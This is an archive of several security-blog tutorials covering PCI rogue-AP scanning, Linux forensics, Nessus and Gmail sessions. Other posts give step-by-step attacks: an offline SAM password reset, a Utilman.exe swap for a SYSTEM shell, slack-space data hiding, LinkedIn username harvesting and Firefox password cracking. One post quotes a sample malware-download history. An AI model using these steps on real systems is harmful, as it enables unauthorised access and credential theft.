Tag Archives: article

PCI Vulnerability Scans – Part II: PCI and Wireless

In my  previous PCI blog post we discussed risk level of vulnerabilities for PCI. In this blog post I will go over wireless requirements and how to detect rogue APs.

11.1 Test for the presence of wireless access points and detect unauthorized wireless access points on a quarterly basis.
Note: Methods that may be used in the process include but are not limited to wireless network scans, physical/logical inspections of system components and infrastructure, network access control (NAC), or wireless IDS/IPS. Whichever methods are used, they must be sufficient to detect and identify any unauthorized devices.

11.1.a Verify that the entity has a documented process to detect and identify wireless access points on a quarterly basis.

11.1.b Verify that the methodology is adequate to detect and identify any unauthorized wireless access points, including at least the following:

_ WLAN cards inserted into system components

_ Portable wireless devices connected to system components

(e.g., by USB, etc.)

_ Wireless devices attached to a network port or network device

11.1.c Verify that the documented process to identify unauthorized wireless access points is performed at least quarterly for all system components and facilities.

11.1.d If automated monitoring is utilized (e.g., wireless IDS/IPS, NAC), verify the configuration will generate alerts to personnel.

11.1.e Verify the organizationʼs incident response plan (Requirement 12.9) includes a response in the event unauthorized wireless devices are detected.

PCI wants you to detect rogue access points. However there is a flaw here. PCI doesn’t require you to monitor your network for rogue access points. It just want you detect them quarterly…

Well, what if attacker deploy an AP after you run your quarterly scan? You will be vulnerable lots of networking attack for a 3 more months and you will think you’re secure since you have PCI certification… This is another example of why you should not think you are secure just because you have a certification…

Anyway, let’s return our subject. So we need to determine rogue AP quarterly. Himm. Let’s see. We can do this by scanning all wireless APs and comparing the BSSIDs (mac address) of the APs that have same SSID with our APs. If we see any AP that has our SSID but not in our asset, that AP is a rogue AP.

A. Windows

Go to Start, type powershell, on the blue screen of power shell run these two following commands:

Netsh wlan show networks mode=bssid -> To get all BSSIDs

Netsh wlan show networks mode=ssid-> To get all SSIDs

B. MAC

KisMAC is a free, open source wireless stumbling and security tool for Mac OS

You can download it at http://kismac-ng.org/

After you run the KisMAC, click Start Scan in the bottom right corner.

C. Linux

Kismet is an 802.11 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring

mode, and can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic (devices and drivers permitting).

Linux users can download Kismet at http://www.kismetwireless.net

Note: Please read the full manual, but for the quick starters, here is the bare minimal instruction to operate Kismet:

• Download Kismet from http://www.kismetwireless.net/download.shtml

• Run “./configure”. Pay attention to the output! If Kismet cannot find all the  headers and libraries it needs, major functionality may be missing. Most notably, compiling Kismet yourself will require the development packages and headers, usually called foo-dev or foo-devel.

• Make sure that all the functionality you need was enabled properly in configure. Almost all users will need pcap and libnl support for proper operation.

• Compile Kismet with “make”.

• Install Kismet with either “make install” or “make suidinstall”.

Note: you must read the “suid” installation and security” section of the Readme or your system may be insecure.

• If you have installed Kismet as suid-root, add your user to the “kismet” group

• Run “kismet”. If you did not install Kismet with suid-root support, you need to start it as root in nearly all situations. This is not recommended as it is

less secure than privsep mode, where packet processing is segregated  from admin rights.

• When prompted to start the Kismet server, choose “Yes”.

• When prompted to add a capture interface, add your wireless interface. In nearly all cases, Kismet will autodetect the device type and supported

channels. If it does not, you will have to manually define the capture type   (as explained later in this README).

• Logs will be stored in the directory created when you started using Kismet, unless it changed via the “logprefix” config file or “–log-prefix” startup option.

• READ THE REST OF THIS README. Kismet has a lot of features and a lot of configuration options. To get the most out of it, you must read all of

the documentation.

 

With these tools you can get all SSIDs and BSSIDs on your area (It is good idea to capture packets in different areas of your buildings so that you have better chance to detect any existed rogue APs.

 

Update: I have received couple of e-mail about PCI scope on wireless. Here is what PCI says about it:

“Wireless
If wireless technology is used to store, process, or transmit cardholder data (for example, point-of-sale transactions, “line-busting”), or if a wireless
local area network (WLAN) is connected to, or part of, the cardholder data environment (for example, not clearly separated by a firewall), the PCI
DSS requirements and testing procedures for wireless environments apply and must be performed (for example, Requirements 1.2.3, 2.1.1, and
4.1.1). Before wireless technology is implemented, an entity should carefully evaluate the need for the technology against the risk. Consider
deploying wireless technology only for non-sensitive data transmission.”

I believe it is pretty straight forward.  If there is no separation of wired/wireless networks with a firewall on your cardholder data environment you cannot think wireless network is out of your scope…

Reset Your Windows Password

We have lots of password to remember : workstation, servers, banks, forums, mails etc… This makes forgetting passwords easier. Today I would like to mention how to remove reset admin password on windows.

I am going to use chntpw. chntpw is a Linux utility to (re)set the password of any user that has a valid (local) account on your WinNT or Win2000 system, by modifying the crypted password in the registry’s SAM file. You do not need to know the old password to set a new one. It works offline (i.e., you have to shutdown your computer and boot off a linux floppy disk).

1. Insert Backtrack’s DVD on your windows computer and boot from CD (usually you can hit f2, f12 in order to see boot order, then you can force computer to boot from CD/DVD).

2. Mount your windows partition:

2.1. Run fdisk -l to determine where is your windows partition.
My windows partition is /dev/sda1

2.2 Create empty folder to mount windows partition.
mkdir /mnt/windows

2.3mount /dev/sda1 /mnt/windows

3. Go into chntpw directory
cd /pentest/passwords/chntpw

4. Run chntpw against your SAM

./chntpw -i /mnt/windows//WINDOWS/system32/config/SAM
5. Type the username you want to reset password, enter, then press 1, enter.

6. After made the changes,  you need to exit from the main chntpw menu and press “Y” to write the changes or “N”to ignore the changes.

 

Hiding Data: Slack Space on Linux

I am going to cover slack space in various operating systems. the first post would be about the slack space in Linux.

What is Slack Space?

Before going to explain slack space, one should know what blocks (on Linux) and clusters mean (on Windows).  Blocks are specific sized containers used by file system to store data. Blocks can also be defined as the smallest pieces of data that a file system can use to store information. Files can consist of a single or multiple blocks/clusters in order to fulfill the size requirements of the file. When data is stored in these blocks two mutually exclusive conditions can occur; The block is completely full, or the block is partially full. If the block is completely full then the most optimal situation for the file system has occurred. If the block is only partially full then the area between the end of the file the end of the container is referred to as slack space. Linux write nulls on slack space. This means to find data in slack space on Linux systems are rare. However, it is not impossible.

Today, I am going to show how to hide data on slack spaces using a tool called bmap.

Bmap

Bmap ,a data hiding tool, can utilize slack space in blocks to hide data.

It can  perform lots of functions interesting to the computer forensics community and the computer security community. However, in this article we will focus on its data hiding capability.

Installing Bmap

Click this link and save the tar.gz file on your Linux desktop.tar xvzf bmap-1.0.17.tar.gz

After untaring the file, we now can go inside of the directory and compile the program.
cd bmap-1.0.17
make

Optional: I placed bmap into /sbin so don’t need to go into the bmap directory each time I want to run the program.
ln -s yourBmapFilePath /sbin/bmap

Hiding Data on Slack Space

In the following example we will hide some text into slack space. Let’s see what options we have with bmap:
bmap --help
bmap:1.0.17 (12/25/10) newt@scyld.com
Usage: bmap [OPTION]... []
use block-list knowledge to perform special operations on files
--doc VALUE
where VALUE is one of:
version display version and exit
help display options and exit
man generate man page and exit
sgml generate SGML invocation info
--mode VALUE
where VALUE is one of:
map list sector numbers
carve extract a copy from the raw device
slack display data in slack space
putslack place data into slack
wipeslack wipe slack
checkslack test for slack (returns 0 if file has slack)
slackbytes print number of slack bytes available
wipe wipe the file from the raw device
frag display fragmentation information for the file
checkfrag test for fragmentation (returns 0 if file is fragmented)
--outfile write output to ...
--label useless bogus option
--name useless bogus option
--verbose be verbose
--log-thresh logging threshold ...
--target operate on ...

The option I am going to use –mode option with slack, putslack, wipe, map VALUEs. I have created a text file named Ismail.txt. Let’s see what sectors this file uses.
bmap --mode map ismail.txt
3113400
3113401
3113402
3113403
3113404
3113405
3113406
3113407

As you can see from the output of bmap, ismail.txt uses 8 sectors starting from 3113400. This corresponds a block in Linux. This text file is too small to use all of these sector in the block.

bmap --mode slack ismail.txt
getting from block 389175
file size was: 8
slack size: 4088
block size: 4096

The file only uses 8 bytes (1 sector is 512 bytes, so it is in the first sector). All of 7 sectors and 504 bytes of the first sector are empty (Linux write null on the slack space, so all they have 0s.)

We can use this slack space to hide data.

echo "I'm hiding this and you cannot easily see it" | bmap --mode putslack ismail.txt
stuffing block 389175
file size was: 8
slack size: 4088
block size: 4096

Now check what we have in slack space:

bmap --mode slack ismail.txt
getting from block 389175
file size was: 8
slack size: 4088
block size: 4096
I'm hiding this and you cannot easily see it

(This command also gives the block number of the file, 389175)

We can now wipe the data we put on slack space.
bmap --mode wipe ismail.txt

bmap --mode slack ismail.txt
getting from block 389175
file size was: 8
slack size: 4088
block size: 4096

Summary

Slack space can be used for hiding data. Even though advanced forensics tools reveal the hidden information in slack space, most system owners will not check all slack space since this is so time consuming activity. Bmap is one of the tool that helps attackers to hide information into slack space on Linux systems. As security engineers, we need to be careful when we analyze a compromised Linux systems and check slack space as well.

Introduction to Linux Forensics- Part I

It has been two weeks since I have not made a new blog post. There are some reasons behind this. I am busy with the work.

However, I don’t ignore my blog and actually was writing 2 new blog posts; one for the e-mail security with GPG and another one  for my third Nessus blog post. Those are still in progress. I just saved them and will complete as soon as I have more free time.

I am currently visiting Rackspace Cloud at San Antonio. I started to write this blog post in the plane and now I will complete it in my hotel room…

———————————————————————————————————

I am currently writing an article for the Slicehost customers to show them how to investigate their slices (Linux VPS) during a  possible compromise.

I am doing some research and implementing my knowledge on the Slicehost environment which takes quite time to complete the article.

I thought it would be good to have a blog post about a more general environment. This is the my first forensic related post. Yes, I have huge interest on Computer Forensics.

Introduction

First of all, this article covers only the basic of Linux forensics. By saying that I won’t cover any highly sophisticated forensic techniques here ( at least in first two articles)

The aim of this blog post is simply showing you the way you can investigate your compromised Linux machine and learn from your mistakes. ( I will have articles about some advanced forensics tools such as autopsy, vinetto and MboxGrep later)

IMPORTANT WARNING: Before you do anything, you need to make an important decision—do you plan to involve law enforcement and prosecute the attacker? If the answer is yes, you should leave the compromised system alone and make no changes to it.

Any changes you make post-attack could complicate and taint the evidence, and because of that, many people have a policy of unplugging a system once they detect an attack and leaving it off until law enforcement arrives.

Investigators likely will want the complete system, or at least the drives, so they can store it safely; thus, your forensics analysis might end here until your system is returned. [1]

Nobody is perfect. Everybody can make mistakes. However, I avoid as much as possible to make same mistake twice. I believe only stupid people do that. At least, I feel stupid if I do same mistakes.

Ok, back to our lesson. We have a compromised Linux machine. First be calm. It is ok to get hacked. We are not only ones whose boxes got cracked. Of course, good system administrators will do everything to avoid this type of situation.

However, even if you believe you are so knowledgeable system admin, your machines can be hacked by an attacker who exploited a new discovered vulnerability…

Checking Network Connection

Check the network connections and open ports with netstat command.

Usage

netstat -an

By running this command you can see the any backdoors that are listening
.

tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN

In this case we see port 6697 is open. It is not a good sign because that port is used by IRC. We can sniff the connection by tcpdump. For more info on tcpdump, check this blog post.

tcpdump src port 6697

You can check here for more info on IRC bots.

Checking Last Logged in IPs

Brute force attack is a very popular type of attack. You may be able to find who was attacked you by checking last logged in IPs with the last command.

Using last you can determine the time a user logged in and out. It also provide you the hostname / IP address from where the user logged in from.

last -25

This will give us last 25 users’ IP who logged in the system.

/var/log/auth_log file can also have valuable information regarding to successful or failed login attempts.

Checking Last Commands

You may have heard “No crime is perfect” a lot if you have ever watched the Forensic Files TV show. It is true. Only a few good hackers cannot leave their finger prints on their digital crime.

For example, most of the time intruders leave their  their .bash_history files. .bash_history file contains the last commands used with the bash shell.

This can give  us a lot information about what they did, what they installed and where they got their files from. Typical entries may include,

wget http://malware.tar.gz
gunzip malware.tar.gz
tar xf malware.tar
cd hpd
install
cd ..
rm malware.tar
cd /dev/.hpd

This tells us the url they got the malware from, how they ran it, and where it was
installed. A good starting point for looking for their directory! [2]

Be aware of the way .bash_history store the information! It only show the all commands which has been run by a spesific user after he logged out.

In case attacker is logged in and you are trying to check his .bash_history, you may see an empty file.

Use who command to see active users on the machine.

who
user1 pts/0 Nov 18 23:33 (1.2.3.4)
user2 pts/1 Nov 16 10:22 (5.6.7.8)

We see two active users on the system. If user2 is compromised account, we should tcpdump and monitor his activity:

tcpdump host 5.6.7.8 -w demo.dump

You can also use thehistory command to list the history of the last executed commands.

To get more useful information from history command and .bash_history file, let’s modify /etc/profile directory.

Add following line at the end of the file:

export HISTTIMEFORMAT=”%h/%d – %H:%M:%S “

You can now see the time when the commands run. (You will be able to see all commands with time stamps on the history ‘s output.

However, for .bash_history, you will be only able to see time stamps for new commands which is not useful for us.

Summary

We learn some basic information for investigating compromised Linux machines such as checking network connection, active users on the system, getting bash history, last logged in users IP etc… All of these are so critical information to track intruders and find security holes on the system.

The next post will discuss integrity checks and some helpful tools such as rootkit scanners.

A Powerful Vulnerabilty Scanner: Nessus- Part I

I will have some blog posts about Nessus. In this first one, I will mention general issues about it.

What is Nessus?

Nessus is a proprietary comprehensive vulnerability scanning software. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.

You can scan ports and see the things crackers can find to hack so you can take action before they do! There will be some examples later for the vulnerabilities we can find with Nessus.

I always think Nessus is kind of outbox scanner for remote stuff and usually it works in that way. However, it can find default password or weak passwords too.

If you are working on a vulnerability management project, I will recommend you to have another scanner for scanning in the boxes ( i.e vulnerabilities for the software running on the machines. I like  Sunbelt Network Security Inspector for this purpose)

Anyway, let’s check License options for Nessus.

Licenses: What are Licenses? Wasn’t Nessus GPL and free ?

It was free but in 2005 creator of  Nessus sold it to Tenable Network Security. Tenable still maintains  Nessus 2.0 under GPL. They closed the source code for the version 3.0 and higher.

Version 3.0 was the first one which was done by Tenable. It was running almost 5 times faster than v2.  V3 was popular too but having 3 licenses for one product makes users a little confused.

The first type of the licenses is ProfessionalFeed License. With this license, Tenable provides you support of the application. They also provide plugins for you earlier than other licenses.

Pricing for the ProfessionalFeed is based upon the number of Nessus scanners in use within your organization, consultancy or service. The cost is $1,200 per scanner per year.

You can buy ProfessionalFeed from here.

The other type of License is HomeFeed License. A HomeFeed is available for free to individual home users, and cannot be used by organizations or individuals professionally.

The last one is on demand. It allows you to evaluate the ProfessionalFeed by using the HomeFeed subscription commercially for 15 days. You may only perform such an evaluation once.

The on-demand evaluation does not give you access to the customer portal, nor to the features specific to the ProfessionalFeed but should be adequate to test Nessus. You can obtain an activation code here.

Installing and Activating Nessus

Installing Nessus is so straight forward. You can download it from this link. It can run on Linux, Windows and Mac.

For this blog post, I installed it on a windows machine.

After you set it up, don’t forget to activate it. (Remember, even non-professional use of nessus, you are  required to get it activated. (They will send you activation key via e-mail, just grab the key and paste on the dialog window)

How It Works

You need to understand how the software works before scanning the machines across the network.

The most important thing you need to know is Nessus is agentless scanner. What is agentless?

Well, some security software needs to be installed on each machine you scan. However, the way nessus works is different. It uses client/server architecture. There will be a client machine in which you can run the software and make configuration for the scan. There will also be a server, the machine which performs what you tell by using the client machine.

Server and client can be same machine. Don’t forget, you don’t need to pay for each client but you need to pay for each server you install (They are required to have different licenses)

Client/Server Architecture brings some flexibilities. The first one is remote scanning.

You can install the server inside of the network and run client from a remote place say your home. This is so helpful since you don’t need to deal with firewall or IDS issues which can effect the scanning result.

Second advantage is one machine is enough to run a scan for all the network. This is definitely time saving!

I will cover the usage and configuration of Nessus in the next blog post.

BackTrack 4 on Windows Machine

As I mention on the “Some Updates About MySelf” I will update my blog  more frequently. Today, I want to talk about BackTrack4.

Backtrack is a lovely Linux distribution for security professionals. BackTrack4 is now using debian deposotories and that makes it nicer for me.

If you want to run BackTrack on your windows machine, you can use LiveCD or a virtual machine.

Only virtual image I have found was for VMware. VMPlayer is not best solution for a windows machine. Ram and cpu usage goes up and machine can be so slow. However Virtual PC 2007 runs smoothly.

If you get BackTrack VMware image from this link and could not find an image for virtual PC, don’t worry. Install VirtualPC 2007 from here.

Then go to this website and get the VMDK converter. This program will convert VMware images to virtual PC’s virtual hard disk image.

Use ‘letmein’ as your username and ‘bugmenot’ as your password ( Yeah, I don’t like to set up an account either!)

After unzip the directory and start program, you convert BackTrack 4 image to Virtual PC’s hard drive.

That is it!

Ask any question or problem you have.

About GMAIL’s Security

One of my friend recently has a problem with one of his gmail account. The account was compromised. He was sure that he was using strong, unpredictable password. I asked him if he has ever used internet on the public places. His answer was no. He also uses ssh proxy so this cannot be a man middle attack by using arp poisoning.

I am not sure if password database of google got attacked and compromised or it was just an individual problem, but I wanted to check my g-mail account to see what security features gmail has.

My friend understood his account got compromised once he discovered there is a back up e-mail address which  he has no idea with it.

The problem is even tough he can change the password, the current sessions would be open.  This is bad since attackers still can read/send e-mail from his account.

After I checked my gmail account I found followings:

gmail security settings

As you see gmail tell us last account activity by giving the login time.

If you click the details, you will see this screen:

gmail2

There are 5 IPs listed here. Now you can check if you see any unfamiliar IP. I saw one IP in there. I have checked it on whatismyipaddress.com and I was surprised it was from NY. I have iphone so when I was in 3G network, I may use NY IP. However, it was listed IMAP instead of mobile, that makes me a little uncomfortable.

I used my iPhone and see that if it was using same network number in the IP address field. Yes, it did! And, I felt much better:)

There is a button at the upper left to sign out all of the open session except the current one. This will make sure that we are now the only one using this account.

I hope you enjoy with these tips:)

Username harvesting from Social Media

I mentioned some command line utilities you can use to extract user names on internet on my previous blog post.

Today I want to discuss one of these tools: Reconioter

Nowadays, everybody wants to be connected. People want to increase their social networking with facebook, myspace, Linkedin, etc.

Reconioter searches Linkedin’s company directories and find possible user names. Its simple syntax as following:

./usernameGen.py query #number of pages

I have installed it on my BackTrack4 and do some testing. For example, we want to learn some user names for Apple employees, then we can run

./usernameGen.py Apple 2
anefkens
arnoldn
nefkensa
dnewell
dustinn
newelld
abologan
anatolb
bologana
pfrancois
paulf
francoisp
bbondy
brennb
bondyb
zbezdan
zsoltb
bezdanz
tinofaith
tobiasi
inofaitht
erami
eduardor
ramie

As you may realize after finding employees names, the program outputs them in some common user name formats: First name last initial, last name first initial, and first initial, last name.

This tool is great for penetration testers who want to demonstrate some intelligence gathering techniques usage.

Owning Windows Vista with Linux

In this blog post I want to show you a security problem related to Windows Vista.

Vista is criticized for mostly because it uses too much resources.  However do you know that you can “own” the Vista by using Linux.

That is right, you can get access to Vista without any password cracking or anything.

First, boot your machine with Linux.

Go to Windows partition:

cd /mnt/sda1 -a

Now, go to System32 directory:

cd Windows/System32

Backup Utilman.exe file:

mv Utilman.exe Utilman_backup.exe

Copy cmd.exe as Utilman.exe

cp cmd.exe Utilman.exe

Now reboot the machine and remove Linux live CD from CD room.

WindowsVistaHacking

Press CTRL+U to invoke utility manager.

Now, command prompt should be appeared since we have cmd.exe instead of original Utilman.exe

Type whoami to see who you are: System!!!

Type explorer and you can do whatever you want!

capture22

This simple example shows how physical security is important in your company or even at home.

Hacking / Recovering Firefox Saved Passwords

Introduction

I covered how/where Firefox store saved passwords on the previous blog post. Today, I will mention how to hack them.

As discussed previously, Firefox uses TripleDES as its encryption algorithm. If master password is not set, we can crack the password with any 64 base decoder since there won’t be encryption.

If master password is used, user needs to attack  key3.db with a password cracker such as FirePassword to recover master password.

Master password is not stored on the key3.db. Firefox stores  encrypted data associated with known string.

Say the known string is realinfosec. If user enter correct master password, he can decrypt the encrypted data as realinfosec.  BOOM!

Known string and decrypted one matched! Firefox now knows that user entered correct master password, so it will decrypt all the saved passwords.

The way Firemaster works is same.

  1. First, Firemaster generates password by using bruteforce, hybrid and dictionary attacks.
  2. After that, it computes hash of master password.
  3. Firepassword uses this hash to decrypt encrypted data.
  4. If the decrypted data matches with the string (i.e realinfosec), it means FireMaster gets the password!

firemaster1

After having master password,  you can decrypt saved passwords via FirePassword.

Currently, Firepassword can only decrypt saved passwords on Sigons.txt files not the ones on the signons.sqlite

Nagareshwar Talekar, creator of these two nice tools,  informed me that he will try to update FirePassword, then it may crack saved passwords stored on the signons.sqlite.

Conclusion

1-) If you forget your master password, you can get it back via FireMaster.

2-) Strength of encryption is depend on the strength of the Master Password you choose

3-)Nothing is impossible, you can recover your Firefox password. However, this means that hackers can crack them as well… Don’t forget; they only need to have key3.db and sigons files (txt and sqlite) to do that. You need to be sure that physical security and network security for your machine are OK.